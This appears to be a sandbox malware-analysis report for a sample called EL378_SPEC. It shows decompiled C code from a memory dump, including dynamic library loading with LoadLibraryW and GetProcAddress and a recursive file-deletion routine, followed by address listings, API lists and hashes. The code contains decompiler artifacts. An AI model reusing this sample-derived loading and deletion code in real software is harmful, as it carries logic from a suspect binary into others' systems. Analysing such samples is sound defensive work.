											goto L78;
										case 0x1d:
											L76:
											_push(6);
											goto L77;
										case 0x1e:
											L67:
											_push(2);
											goto L77;
										case 0x1f:
											__eax =  &_v44;
											__esi = E6ECC1BCF( &_v44) + 1;
											L83:
											__ecx = _v44;
											_v60 = _v44;
											L95:
											__eflags = __esi;
											if(__esi == 0) {
												goto L157;
											}
											L104:
											__edx = _v48;
											0 = 1;
											_v24 = 1;
											__eflags = __edx;
											if(__edx != 0) {
												__eflags = __edx - 1;
												if(__edx == 1) {
													__eax = _v28;
													__eax = _v28 << 5;
													__eflags = __eax;
													 *(__eax + __edi + 0x102c) = __esi;
												}
												L111:
												__edx = __edx + 1;
												_v48 = __edx;
												goto L157;
											}
											__ebx = _v28;
											__ebx = _v28 << 5;
											__eax =  *(__ebx + __edi + 0x1030);
											__eflags = __eax - 0xffffffff;
											if(__eax <= 0xffffffff) {
												L107:
												__eax = GlobalFree(__eax);
												__edx = _v48;
												L108:
												 *(__ebx + __edi + 0x1030) = __esi;
												goto L111;
											}
											__eflags = __eax - 0x19;
											if(__eax <= 0x19) {
												goto L108;
											}
											goto L107;
										case 0x20:
											L70:
											_v16 = _v16 + 1;
											_push("true");
											goto L77;
										case 0x21:
											L74:
											_push("true");
											L77:
											_pop(__eax);
											L78:
											__ecx =  *(0x6ecc4094 + __eax * 4);
											0 = 1;
											__esi = __ebx;
											__esi = __ebx << 5;
											__edx =  ~__edx;
											_push(1);
											asm("sbb edx, edx");
											_v24 = 1;
											__edx = __edx & 0x00008000;
											__edx = __edx | __eax;
											0 = 1;
											 *(__esi + __edi + 0x1018) = __edx;
											__edx = _v56;
											__eflags = __ecx;
											__eax =  >  ? __ecx : 1;
											__eflags = __edx;
											_pop(__ecx);
											__eax =  <  ? __ecx :  >  ? __ecx : 1;
											 *((intOrPtr*)(__esi + __edi + 0x1028)) =  <  ? __ecx :  >  ? __ecx : 1;
											__eflags = __edx - __ecx;
											if(__edx == __ecx) {
												__eax =  &_v44;
												__eax = E6ECC1BCF( &_v44);
												__ecx = _v44;
												_v60 = _v44;
												__edx = __eax + 1;
												_v56 = __edx;
											}
											__ecx = __ebx + 0x81;
											 *(__esi + __edi + 0x101c) = __edx;
											__ecx = __ebx + 0x81 << 5;
											__edx = 0;
											 *((intOrPtr*)(__esi + __edi + 0x1030)) = 0;
											 *((intOrPtr*)(__esi + __edi + 0x102c)) = 0;
											 *((intOrPtr*)((__ebx + 0x81 << 5) + __edi)) = 0;
											goto L157;
										case 0x22:
											goto L157;
									}
								}
								_t356 = _t354 - 1;
								__eflags = _t356;
								if(_t356 == 0) {
									_t325 = 0;
									_v28 = 0;
									goto L51;
								}
								__eflags = _t356 != 1;
								if(_t356 != 1) {
									goto L123;
								}
								__eflags = _t250 - 0x6e;
								if(__eflags > 0) {
									_t310 = _t250 - 0x72;
									__eflags = _t310;
									if(_t310 == 0) {
										_push("true");
										L43:
										_pop(_t311);
										L44:
										_t358 =  *(_t390 + 0x1010);
										__eflags = _v56 - 1;
										if(_v56 != 1) {
											_t359 = _t358 &  !_t311;
											__eflags = _t359;
										} else {
											_t359 = _t358 | _t311;
										}
										 *(_t390 + 0x1010) = _t359;
										goto L48;
									}
									_t315 = _t310 - 1;
									__eflags = _t315;
									if(_t315 == 0) {
										_push("true");
										goto L43;
									}
									_t360 = 2;
									__eflags = _t315 != _t360;
									if(_t315 != _t360) {
										goto L157;
									}
									_push("true");
									goto L43;
								}
								if(__eflags == 0) {
									_push("true");
									goto L43;
								}
								_t317 = _t250 - 0x21;
								__eflags = _t317;
								if(_t317 == 0) {
									_v56 =  ~_v56;
									goto L157;
								}
								_t318 = _t317 - 0x11;
								__eflags = _t318;
								if(_t318 == 0) {
									_t311 = 0x100;
									goto L44;
								}
								_t319 = _t318 - 0x31;
								__eflags = _t319;
								if(_t319 == 0) {
									_t311 = 1;
									goto L44;
								}
								_t361 = 2;
								__eflags = _t319 != _t361;
								if(_t319 != _t361) {
									goto L157;
								}
								_push("true");
								goto L43;
							}
							_v52 = _v52 & 0x00000000;
							_t400 = 0;
							_v32 = 0;
							goto L133;
						}
						_t362 = _v60;
						_t407 = 0x3a;
						__eflags =  *((intOrPtr*)(_t362 - 2)) - _t407;
						_t348 = _v52;
						if( *((intOrPtr*)(_t362 - 2)) != _t407) {
							goto L31;
						}
						__eflags = _t348;
						if(_t348 == 0) {
							goto L15;
						}
						goto L31;
					}
					_t363 = _t347 - 5;
					if(_t363 == 0) {
						__eflags = _v36;
						if(_v36 == 0) {
							_v52 = 1;
							__eflags = _v32 - 3;
							_t374 = (0 | _v32 == 0x00000003) + 1;
							__eflags = _t374;
							_v28 = _t374;
						}
						_v56 = _v56 & 0x00000000;
						_t409 = _v36;
						__eflags = _t409;
						_t365 =  ==  ? _v56 : _v56;
						_v56 =  ==  ? _v56 : _v56;
						_v24 = _v24 & 0x00000000;
						__eflags = _t409;
						_t367 =  ==  ? _v24 : _v24;
						_v24 =  ==  ? _v24 : _v24;
						__eflags = _t409;
						_t369 = 0 | _t409 == 0x00000000;
						_v48 = _v48 & 0x00000000;
						__eflags = _v36;
						_t411 =  ==  ? _v48 : _v48;
						L13:
						_v48 = _t411;
						__eflags = _t369;
						if(_t369 != 0) {
							goto L132;
						}
						L14:
						_t348 = _v52;
						goto L15;
					}
					_t375 = _t363 - 1;
					if(_t375 == 0) {
						_t413 = _v36;
						__eflags = _t413;
						_t377 =  ==  ? _v4 : _v52;
						_v52 =  ==  ? _v4 : _v52;
						_v56 = _v56 & 0x00000000;
						__eflags = _t413;
						_t379 =  ==  ? _v56 : _v56;
						_v56 =  ==  ? _v56 : _v56;
						__eflags = _t413;
						_t369 = 0 | _t413 == 0x00000000;
						_v48 = _v48 & 0x00000000;
						__eflags = _v36;
						_t411 =  ==  ? _v48 : _v48;
						goto L13;
					}
					if(_t375 != 0x16) {
						goto L14;
					} else {
						_v52 = 3;
						_v56 = 1;
						goto L132;
					}
				}
				GlobalFree(_v8);
				GlobalFree(_v40);
				GlobalFree(_v20);
				if(_t390 == 0 ||  *(_t390 + 0x100c) != 0) {
					L186:
					return _t390;
				} else {
					_t260 =  *_t390 - 1;
					if(_t260 == 0) {
						_t393 = _t390 + 8;
						__eflags =  *_t393;
						if( *_t393 != 0) {
							_t261 = GetModuleHandleW(_t393);
							 *(_t390 + 0x1008) = _t261;
							__eflags = _t261;
							if(_t261 != 0) {
								_t394 = _t390 + 0x808;
								_t262 = E6ECC1F7B(_t261, _t394);
								 *(_t390 + 0x100c) = _t262;
								__eflags = _t262;
								if(_t262 == 0) {
									_t265 = 0x23;
									__eflags =  *_t394 - _t265;
									if( *_t394 == _t265) {
										_push(_t390 + 0x80a);
										_t267 = E6ECC135A();
										__eflags = _t267;
										if(_t267 != 0) {
											__eflags = _t267 & 0xffff0000;
											if((_t267 & 0xffff0000) == 0) {
												 *(_t390 + 0x100c) = GetProcAddress( *(_t390 + 0x1008), _t267 & 0x0000ffff);
											}
										}
									}
								}
								__eflags = _v16;
								if(_v16 != 0) {
									L181:
									_t394[lstrlenW(_t394)] = 0x57;
									_t264 = E6ECC1F7B( *(_t390 + 0x1008), _t394);
									__eflags = _t264;
									if(_t264 == 0) {
										__eflags =  *(_t390 + 0x100c);
										L184:
										if(__eflags != 0) {
											goto L186;
										}
										L185:
										_t244 = _t390 + 4;
										 *_t244 =  *(_t390 + 4) | 0xffffffff;
										__eflags =  *_t244;
										goto L186;
									}
									L182:
									 *(_t390 + 0x100c) = _t264;
									goto L186;
								} else {
									__eflags =  *(_t390 + 0x100c);
									if( *(_t390 + 0x100c) != 0) {
										goto L186;
									}
									goto L181;
								}
							}
							_t261 = LoadLibraryW(_t393);
							 *(_t390 + 0x1008) = _t261;
							 *0xFFFFFFFF8D840FC0 =  *((intOrPtr*)(0xffffffff8d840fc0)) + _t261;
							_t261->i = _t261 + _t261->i;
							 *0x000808B7 = _t329 +  *0x000808B7;
							__eflags =  *0x000808B7;
						}
						_t222 = _t390 + 0x808; // 0x808
						_t271 = E6ECC135A();
						 *(_t390 + 0x100c) = _t271;
						__eflags = _t271;
						goto L184;
					}
					_t272 = _t260 - 1;
					if(_t272 == 0) {
						_t220 = _t390 + 0x808; // 0x808
						_t273 = _t220;
						__eflags =  *_t273;
						if( *_t273 == 0) {
							goto L186;
						}
						_push(_t273);
						_t264 = E6ECC135A();
						goto L182;
					}
					if(_t272 != 1) {
						goto L186;
					}
					_t328 = _t390 + 8;
					_push(_t390 + 8);
					_t395 = E6ECC135A();
					 *(_t390 + 0x1008) = _t395;
					if(_t395 == 0) {
						goto L185;
					}
					 *((intOrPtr*)(_t390 + 0x104c)) = 0;
					 *((intOrPtr*)(_t390 + 0x1050)) = E6ECC12E1(_t328);
					 *((intOrPtr*)(_t390 + 0x103c)) = 0;
					 *((intOrPtr*)(_t390 + 0x1048)) = 1;
					 *((intOrPtr*)(_t390 + 0x1038)) = 1;
					_t217 = _t390 + 0x808; // 0x808
					_t264 =  *(_t395->i + E6ECC135A() * 4);
					goto L182;
				}
			}

0x6ecc2359
0x6ecc235b
0x6ecc2360
0x6ecc2364
0x6ecc2366
0x6ecc236a
0x6ecc236e
0x6ecc2372
0x6ecc2376
0x6ecc237a
0x6ecc237f
0x6ecc2383
0x6ecc238a
0x6ecc238e
0x6ecc2393
0x6ecc2395
0x6ecc2399
0x6ecc239d
0x6ecc239f
0x6ecc23a3
0x6ecc23ab
0x6ecc23ab
0x6ecc23af
0x00000000
0x00000000
0x6ecc23b9
0x6ecc23bc
0x6ecc23c1
0x6ecc23c5
0x6ecc23c8
0x6ecc2911
0x6ecc2911
0x6ecc2911
0x6ecc2916
0x6ecc2916
0x6ecc291a
0x6ecc291a
0x6ecc291d
0x6ecc2940
0x6ecc2943
0x6ecc2945
0x6ecc2966
0x6ecc2966
0x6ecc2947
0x6ecc294e
0x6ecc2954
0x6ecc2956
0x6ecc2958
0x6ecc295e
0x6ecc295e
0x6ecc296a
0x6ecc2970
0x6ecc2973
0x6ecc2979
0x6ecc2979
0x6ecc297f
0x6ecc2982
0x6ecc2987
0x6ecc2989
0x6ecc298c
0x6ecc298c
0x6ecc298e
0x6ecc29b7
0x6ecc29bb
0x00000000
0x00000000
0x6ecc29be
0x6ecc29c0
0x6ecc29c6
0x6ecc29cf
0x6ecc29d2
0x6ecc29d4
0x00000000
0x00000000
0x00000000
0x00000000
0x6ecc29d6
0x6ecc29d6
0x6ecc29d6
0x6ecc29dc
0x6ecc29de
0x00000000
0x00000000
0x6ecc29e0
0x6ecc29e2
0x6ecc29e2
0x6ecc29e6
0x6ecc29e8
0x6ecc29ea
0x6ecc29ea
0x6ecc29ea
0x6ecc29ea
0x6ecc29f1
0x6ecc29f7
0x6ecc29f9
0x6ecc2a0f
0x6ecc2a10
0x6ecc2a10
0x6ecc2a12
0x6ecc29fb
0x6ecc2a01
0x6ecc2a04
0x6ecc2a04
0x00000000
0x6ecc2990
0x6ecc2990
0x6ecc2990
0x6ecc2993
0x6ecc299f
0x6ecc29a4
0x6ecc29aa
0x6ecc29aa
0x6ecc29ae
0x6ecc29af
0x6ecc29af
0x6ecc2a18
0x6ecc2a18
0x6ecc2a1c
0x6ecc2a1c
0x6ecc2a20
0x6ecc2a20
0x6ecc2a24
0x6ecc2a27
0x6ecc2a2b
0x6ecc2a2d
0x6ecc2a34
0x00000000
0x00000000
0x00000000
0x6ecc2a34
0x6ecc2995
0x6ecc2995
0x6ecc2998
0x00000000
0x00000000
0x6ecc299a
0x6ecc299d
0x00000000
0x00000000
0x00000000
0x6ecc299d
0x6ecc298e
0x6ecc291f
0x6ecc2922
0x6ecc2928
0x6ecc2930
0x6ecc2932
0x6ecc2932
0x6ecc2933
0x6ecc2933
0x00000000
0x6ecc2922
0x6ecc23ce
0x6ecc23d1
0x6ecc2502
0x6ecc2506
0x6ecc2522
0x6ecc2526
0x6ecc2526
0x6ecc252b
0x6ecc24b8
0x6ecc24ba
0x6ecc24ba
0x6ecc24bc
0x6ecc2852
0x6ecc2870
0x6ecc2870
0x6ecc2873
0x00000000
0x00000000
0x6ecc2858
0x6ecc285b
0x6ecc2860
0x6ecc2864
0x6ecc2866
0x6ecc28a9
0x6ecc28aa
0x6ecc28ae
0x6ecc28ae
0x6ecc28b7
0x6ecc28ba
0x6ecc28bb
0x00000000
0x6ecc28bb
0x6ecc2868
0x6ecc2868
0x6ecc2868
0x6ecc286d
0x6ecc286d
0x6ecc2875
0x6ecc2878
0x6ecc2907
0x6ecc2908
0x00000000
0x6ecc2908
0x6ecc2880
0x6ecc2881
0x6ecc2883
0x6ecc288c
0x6ecc288c
0x6ecc288f
0x6ecc2892
0x6ecc28c2
0x6ecc28c2
0x6ecc28c7
0x6ecc28c8
0x6ecc28cb
0x00000000
0x00000000
0x6ecc28cd
0x6ecc28d0
0x00000000
0x00000000
0x6ecc28d4
0x6ecc28d5
0x6ecc28d9
0x6ecc28d9
0x6ecc28db
0x6ecc28df
0x6ecc28e3
0x6ecc28fd
0x00000000
0x6ecc28fd
0x6ecc28e5
0x6ecc28eb
0x6ecc28ef
0x00000000
0x6ecc28ef
0x6ecc2894
0x6ecc2897
0x6ecc289b
0x00000000
0x00000000
0x6ecc289d
0x00000000
0x6ecc289d
0x6ecc2887
0x6ecc2888
0x6ecc288a
0x00000000
0x00000000
0x00000000
0x6ecc288a
0x6ecc24c2
0x6ecc24c2
0x6ecc24c5
0x6ecc25a7
0x6ecc25ab
0x6ecc25ab
0x6ecc25ae
0x6ecc25b1
0x00000000
0x00000000
0x6ecc25b7
0x6ecc25be
0x00000000
0x6ecc278d
0x6ecc2791
0x6ecc2795
0x6ecc2797
0x6ecc279a
0x6ecc279b
0x6ecc279b
0x6ecc279e
0x6ecc27a1
0x6ecc27a4
0x00000000
0x00000000
0x6ecc27a6
0x6ecc27a6
0x6ecc27aa
0x6ecc27c3
0x6ecc27c3
0x6ecc27c7
0x6ecc27c7
0x6ecc27ca
0x6ecc27ce
0x6ecc27d7
0x00000000
0x6ecc27d7
0x6ecc27ac
0x6ecc27ac
0x6ecc27af
0x00000000
0x00000000
0x6ecc27b1
0x6ecc27b4
0x6ecc27b6
0x6ecc27b6
0x6ecc27b6
0x6ecc27b9
0x6ecc27bc
0x6ecc27bf
0x6ecc279b
0x6ecc279e
0x6ecc27a1
0x6ecc27a4
0x00000000
0x00000000
0x00000000
0x6ecc27a4
0x00000000
0x6ecc2593
0x6ecc2596
0x00000000
0x00000000
0x6ecc2618
0x00000000
0x00000000
0x6ecc25ff
0x6ecc2603
0x6ecc2605
0x6ecc2609
0x6ecc260a
0x6ecc260b
0x6ecc260f
0x00000000
0x00000000
0x6ecc2757
0x6ecc275b
0x00000000
0x00000000
0x6ecc2761
0x6ecc2765
0x6ecc2767
0x6ecc2768
0x6ecc276a
0x6ecc2773
0x6ecc2775
0x6ecc2779
0x6ecc277b
0x6ecc2781
0x6ecc2782
0x6ecc2783
0x6ecc2788
0x00000000
0x00000000
0x6ecc2716
0x00000000
0x00000000
0x6ecc2622
0x00000000
0x00000000
0x6ecc27f8
0x00000000
0x00000000
0x6ecc262a
0x6ecc262c
0x6ecc262d
0x00000000
0x00000000
0x6ecc27e8
0x00000000
0x00000000
0x6ecc27ec
0x00000000
0x00000000
0x6ecc27f4
0x00000000
0x00000000
0x6ecc2676
0x6ecc2676
0x6ecc2678
0x00000000
0x00000000
0x6ecc263d
0x6ecc263f
0x6ecc2640
0x00000000
0x00000000
0x6ecc2650
0x6ecc2652
0x6ecc2653
0x00000000
0x00000000
0x6ecc2688
0x6ecc2688
0x6ecc268a
0x00000000
0x00000000
0x6ecc265c
0x6ecc265c
0x6ecc265e
0x00000000
0x00000000
0x6ecc2665
0x00000000
0x00000000
0x6ecc27f0
0x6ecc27fa
0x6ecc27fa
0x00000000
0x00000000
0x6ecc271f
0x6ecc2724
0x6ecc272a
0x6ecc272c
0x6ecc272d
0x6ecc2730
0x6ecc2732
0x6ecc2734
0x6ecc2735
0x6ecc2738
0x6ecc2738
0x00000000
0x00000000
0x6ecc27e3
0x00000000
0x00000000
0x6ecc2669
0x6ecc2669
0x6ecc266b
0x00000000
0x00000000
0x6ecc2626
0x00000000
0x00000000
0x6ecc267f
0x6ecc267f
0x6ecc2681
0x00000000
0x00000000
0x6ecc25c5
0x6ecc25d1
0x6ecc25d3
0x6ecc25d5
0x6ecc25d8
0x6ecc25dc
0x6ecc25e0
0x6ecc25e4
0x6ecc25f0
0x6ecc25f2
0x6ecc25f3
0x6ecc25f6
0x00000000
0x00000000
0x6ecc2631
0x6ecc2633
0x6ecc2633
0x6ecc2634
0x6ecc2634
0x6ecc2636
0x6ecc2637
0x00000000
0x00000000
0x6ecc267b
0x6ecc267b
0x00000000
0x00000000
0x6ecc2644
0x6ecc2646
0x6ecc2646
0x6ecc2647
0x6ecc2647
0x6ecc2649
0x6ecc264a
0x00000000
0x00000000
0x6ecc2657
0x6ecc2659
0x00000000
0x00000000
0x6ecc268d
0x6ecc268d
0x00000000
0x00000000
0x6ecc2661
0x6ecc2661
0x00000000
0x00000000
0x6ecc2747
0x6ecc2752
0x6ecc273a
0x6ecc273a
0x6ecc273e
0x6ecc27d9
0x6ecc27d9
0x6ecc27db
0x00000000
0x00000000
0x6ecc27fb
0x6ecc27fb
0x6ecc2801
0x6ecc2802
0x6ecc2806
0x6ecc2808
0x6ecc2836
0x6ecc2838
0x6ecc283a
0x6ecc283e
0x6ecc283e
0x6ecc2841
0x6ecc2841
0x6ecc2848
0x6ecc2848
0x6ecc2849
0x00000000
0x6ecc2849
0x6ecc280a
0x6ecc280e
0x6ecc2811
0x6ecc2818
0x6ecc281b
0x6ecc2822
0x6ecc2823
0x6ecc2829
0x6ecc282d
0x6ecc282d
0x00000000
0x6ecc282d
0x6ecc281d
0x6ecc2820
0x00000000
0x00000000
0x00000000
0x00000000
0x6ecc266e
0x6ecc266e
0x6ecc2672
0x00000000
0x00000000
0x6ecc2684
0x6ecc2684
0x6ecc268f
0x6ecc268f
0x6ecc2690
0x6ecc2690
0x6ecc2699
0x6ecc269a
0x6ecc269c
0x6ecc269f
0x6ecc26a1
0x6ecc26a2
0x6ecc26a4
0x6ecc26a8
0x6ecc26ae
0x6ecc26b2
0x6ecc26b3
0x6ecc26ba
0x6ecc26be
0x6ecc26c0
0x6ecc26c3
0x6ecc26c5
0x6ecc26c6
0x6ecc26c9
0x6ecc26d0
0x6ecc26d2
0x6ecc26d4
0x6ecc26d9
0x6ecc26df
0x6ecc26e3
0x6ecc26e7
0x6ecc26ea
0x6ecc26ea
0x6ecc26ee
0x6ecc26f4
0x6ecc26fb
0x6ecc26fe
0x6ecc2700
0x6ecc2707
0x6ecc270e
0x00000000
0x00000000
0x00000000
0x00000000
0x6ecc25be
0x6ecc24cb
0x6ecc24cb
0x6ecc24ce
0x6ecc259f
0x6ecc25a1
0x00000000
0x6ecc25a1
0x6ecc24d4
0x6ecc24d7
0x00000000
0x00000000
0x6ecc24dd
0x6ecc24e0
0x6ecc2556
0x6ecc2556
0x6ecc2559
0x6ecc2573
0x6ecc2575
0x6ecc2575
0x6ecc2576
0x6ecc2576
0x6ecc257f
0x6ecc2583
0x6ecc258b
0x6ecc258b
0x6ecc2585
0x6ecc2585
0x6ecc2585
0x6ecc258d
0x00000000
0x6ecc258d
0x6ecc255b
0x6ecc255b
0x6ecc255e
0x6ecc256f
0x00000000
0x6ecc256f
0x6ecc2562
0x6ecc2563
0x6ecc2565
0x00000000
0x00000000
0x6ecc256b
0x00000000
0x6ecc256b
0x6ecc24e2
0x6ecc2552
0x00000000
0x6ecc2552
0x6ecc24e4
0x6ecc24e4
0x6ecc24e7
0x6ecc2549
0x00000000
0x6ecc2549
0x6ecc24e9
0x6ecc24e9
0x6ecc24ec
0x6ecc2542
0x00000000
0x6ecc2542
0x6ecc24ee
0x6ecc24ee
0x6ecc24f1
0x6ecc253f
0x00000000
0x6ecc253f
0x6ecc24f5
0x6ecc24f6
0x6ecc24f8
0x00000000
0x00000000
0x6ecc24fe
0x00000000
0x6ecc24fe
0x6ecc252d
0x6ecc2532
0x6ecc2534
0x00000000
0x6ecc2534
0x6ecc2508
0x6ecc250e
0x6ecc250f
0x6ecc2516
0x6ecc251a
0x00000000
0x00000000
0x6ecc251c
0x6ecc251e
0x00000000
0x00000000
0x00000000
0x6ecc2520
0x6ecc23d7
0x6ecc23da
0x6ecc2441
0x6ecc2446
0x6ecc244b
0x6ecc2451
0x6ecc2459
0x6ecc2459
0x6ecc245a
0x6ecc245a
0x6ecc2462
0x6ecc2467
0x6ecc246b
0x6ecc246d
0x6ecc2472
0x6ecc247a
0x6ecc247f
0x6ecc2481
0x6ecc2486
0x6ecc248c
0x6ecc2492
0x6ecc2495
0x6ecc249a
0x6ecc249f
0x6ecc24a4
0x6ecc24a4
0x6ecc24ac
0x6ecc24ae
0x00000000
0x00000000
0x6ecc24b4
0x6ecc24b4
0x00000000
0x6ecc24b4
0x6ecc23dc
0x6ecc23df
0x6ecc23fe
0x6ecc2402
0x6ecc2408
0x6ecc240d
0x6ecc2415
0x6ecc241a
0x6ecc241c
0x6ecc2421
0x6ecc2427
0x6ecc242d
0x6ecc2430
0x6ecc2435
0x6ecc243a
0x00000000
0x6ecc243a
0x6ecc23e4
0x00000000
0x6ecc23ea
0x6ecc23ec
0x6ecc23f5
0x00000000
0x6ecc23f5
0x6ecc23e4
0x6ecc2a44
0x6ecc2a4a
0x6ecc2a50
0x6ecc2a54
0x6ecc2bd0
0x6ecc2bd9
0x6ecc2a68
0x6ecc2a6a
0x6ecc2a6d
0x6ecc2af7
0x6ecc2afa
0x6ecc2afd
0x6ecc2b1a
0x6ecc2b20
0x6ecc2b26
0x6ecc2b28
0x6ecc2b3f
0x6ecc2b47
0x6ecc2b4c
0x6ecc2b54
0x6ecc2b56
0x6ecc2b5a
0x6ecc2b5b
0x6ecc2b5e
0x6ecc2b66
0x6ecc2b67
0x6ecc2b6d
0x6ecc2b6f
0x6ecc2b71
0x6ecc2b76
0x6ecc2b88
0x6ecc2b88
0x6ecc2b76
0x6ecc2b6f
0x6ecc2b5e
0x6ecc2b8e
0x6ecc2b92
0x6ecc2b9c
0x6ecc2ba4
0x6ecc2bb1
0x6ecc2bb8
0x6ecc2bba
0x6ecc2bc4
0x6ecc2bca
0x6ecc2bca
0x00000000
0x00000000
0x6ecc2bcc
0x6ecc2bcc
0x6ecc2bcc
0x6ecc2bcc
0x00000000
0x6ecc2bcc
0x6ecc2bbc
0x6ecc2bbc
0x00000000
0x6ecc2b94
0x6ecc2b94
0x6ecc2b9a
0x00000000
0x00000000
0x00000000
0x6ecc2b9a
0x6ecc2b92
0x6ecc2b2b
0x6ecc2b31
0x6ecc2b36
0x6ecc2b3c
0x6ecc2b3e
0x6ecc2b3e
0x6ecc2b3e
0x6ecc2aff
0x6ecc2b06
0x6ecc2b0c
0x6ecc2b12
0x00000000
0x6ecc2b12
0x6ecc2a73
0x6ecc2a76
0x6ecc2adc
0x6ecc2adc
0x6ecc2ae2
0x6ecc2ae5
0x00000000
0x00000000
0x6ecc2aeb
0x6ecc2aec
0x00000000
0x6ecc2af1
0x6ecc2a7b
0x00000000
0x00000000
0x6ecc2a81
0x6ecc2a84
0x6ecc2a8a
0x6ecc2a8c
0x6ecc2a95
0x00000000
0x00000000
0x6ecc2a9c
0x6ecc2aa7
0x6ecc2ab0
0x6ecc2ab6
0x6ecc2abc
0x6ecc2ac2
0x6ecc2ad5
0x00000000
0x6ecc2ad5

APIs

Part of subcall function 6ECC12F8: GlobalAlloc.KERNEL32(?,?,6ECC11C4,-000000A0), ref: 6ECC1302

GlobalAlloc.KERNELBASE(?,00001CA4), ref: 6ECC294E
lstrcpyW.KERNEL32(00000008,?), ref: 6ECC29A4
lstrcpyW.KERNEL32(00000808,?), ref: 6ECC29AF
GlobalFree.KERNEL32(00000000), ref: 6ECC29C0
GlobalFree.KERNEL32(?), ref: 6ECC2A44
GlobalFree.KERNEL32(?), ref: 6ECC2A4A
GlobalFree.KERNEL32(?), ref: 6ECC2A50
GetModuleHandleW.KERNEL32(00000008), ref: 6ECC2B1A

Memory Dump Source

Source File: 00000000.00000002.15063213998.000000006ECC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6ECC0000, based on PE: true

Associated: 00000000.00000002.15063182408.000000006ECC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.15063255603.000000006ECC4000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.15063283859.000000006ECC6000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ecc0000_EL378_SPEC.jbxd

Similarity

API ID: Global$Free$Alloclstrcpy$HandleModule
String ID:
API String ID: 4117476331-0
Opcode ID: 6b18a4fe4a140ce29ebf68619c178c84e9012748a84b3c5ca041d6e2a77407ec
Instruction ID: a05f5475c80ce4b08f8b1200e377f11882cdf030d00fd38c15bc44fe907880ef
Opcode Fuzzy Hash: 6b18a4fe4a140ce29ebf68619c178c84e9012748a84b3c5ca041d6e2a77407ec
Instruction Fuzzy Hash: 4632B171A48B02DFC35CCFAA846075AB7E0FB89B14F006A2EE599D7244F770D5858B93

Uniqueness

Uniqueness Score: -1.00%

Function 00406719 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 155
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E00406719(void* __eflags, WCHAR* _a4, signed char _a8) {
				short _v544;
				short _v546;
				struct _WIN32_FIND_DATAW _v592;
				signed int _v596;
				signed char _v600;
				signed int _v604;
				signed int _t27;
				void* _t40;
				signed int _t43;
				signed int _t46;
				signed int _t54;
				void* _t56;
				signed char _t57;
				signed int _t60;
				WCHAR* _t61;
				signed int _t64;
				void* _t66;

				_t57 = _a8;
				_t61 = _a4;
				_t60 = _t57 & 0x00000004;
				_t27 = E00406638(__eflags, _t61);
				_v600 = _t27;
				if((_t57 & 0x00000008) != 0) {
					_t54 = DeleteFileW(_t61); // executed
					asm("sbb eax, eax");
					_t56 =  ~_t54 + 1;
					 *0x435ac8 =  *0x435ac8 + _t56;
					return _t56;
				}
				_t64 = _t57 & 0x00000001;
				__eflags = _t64;
				_v600 = _t64;
				if(_t64 == 0) {
					L5:
					E00406B1A(0x42fdc0, _t61);
					__eflags = _t64;
					if(_t64 == 0) {
						E00406D10(_t61);
					} else {
						lstrcatW(0x42fdc0, L"\\*.*");
					}
					__eflags =  *_t61;
					if( *_t61 != 0) {
						L10:
						lstrcatW(_t61, 0x4092b0);
						goto L11;
					} else {
						__eflags =  *0x42fdc0 - 0x5c;
						if( *0x42fdc0 != 0x5c) {
							L11:
							_v604 =  &(_t61[lstrlenW(_t61)]);
							_t27 = FindFirstFileW(0x42fdc0,  &_v592);
							_t66 = _t27;
							__eflags = _t66 - 0xffffffff;
							if(_t66 == 0xffffffff) {
								L27:
								__eflags = _v600;
								if(_v600 == 0) {
									goto L35;
								}
								_t27 = _v604;
								 *((short*)(_t27 - 2)) = 0;
								__eflags = _v596;
								if(_v596 == 0) {
									goto L33;
								}
								goto L29;
							}
							_t40 = 0x2e;
							do {
								__eflags = _v592.cFileName - _t40;
								if(_v592.cFileName != _t40) {
									L17:
									E00406B1A(_v604,  &(_v592.cFileName));
									__eflags = _v600 & 0x00000010;
									if(__eflags == 0) {
										_t43 = E00406585(__eflags, _t61, _t60);
										__eflags = _t43;
										if(_t43 != 0) {
											E00405D3A(0xfffffff2, _t61);
										} else {
											__eflags = _t60;
											if(_t60 == 0) {
												 *0x435ac8 =  *0x435ac8 + 1;
											} else {
												E00405D3A(0xfffffff1, _t61);
												E0040623D(_t61, 0);
											}
										}
									} else {
										__eflags = (_t57 & 0x00000003) - 3;
										if(__eflags == 0) {
											E00406719(__eflags, _t61, _t57);
										}
									}
									goto L25;
								}
								__eflags = _v546;
								if(_v546 == 0) {
									goto L25;
								}
								__eflags = _v546 - _t40;
								if(_v546 != _t40) {
									goto L17;
								}
								__eflags = _v544;
								if(_v544 == 0) {
									goto L25;
								}
								goto L17;
								L25:
								_t46 = FindNextFileW(_t66,  &_v592);
								__eflags = _t46;
								_t40 = 0x2e;
							} while (_t46 != 0);
							_t27 = FindClose(_t66);
							goto L27;
						}
						goto L10;
					}
				} else {
					__eflags = _t27;
					if(_t27 == 0) {
						L33:
						 *0x435ac8 =  *0x435ac8 + 1;
						L35:
						return _t27;
					}
					__eflags = _t57 & 0x00000002;
					if((_t57 & 0x00000002) == 0) {
						L29:
						_t27 = E004065CF(_t61);
						__eflags = _t27;
						if(_t27 == 0) {
							goto L35;
						}
						E00406556(_t61);
						_t27 = E00406585(__eflags, _t61, _t60 | 0x00000001);
						__eflags = _t27;
						if(_t27 != 0) {
							_t27 = E00405D3A(0xffffffe5, _t61);
							goto L35;
						}
						__eflags = _t60;
						if(_t60 == 0) {
							goto L33;
						}
						E00405D3A(0xfffffff1, _t61);
						_t27 = E0040623D(_t61, 0);
						goto L35;
					}
					goto L5;
				}
			}

0x00406720
0x00406728
0x00406733
0x00406736
0x0040673b
0x00406742
0x00406745
0x0040674d
0x0040674f
0x00406750
0x00000000
0x00406750
0x0040675e
0x0040675e
0x00406761
0x00406765
0x00406778
0x0040677e
0x00406783
0x0040678b
0x0040679c
0x0040678d
0x00406797
0x00406797
0x004067a3
0x004067a6
0x004067b2
0x004067b8
0x00000000
0x004067a8
0x004067a8
0x004067b0
0x004067ba
0x004067c4
0x004067d2
0x004067d8
0x004067da
0x004067dd
0x0040687b
0x0040687b
0x00406880
0x00000000
0x00000000
0x00406882
0x00406888
0x0040688c
0x00406890
0x00000000
0x00000000
0x00000000
0x00406890
0x004067e5
0x004067e6
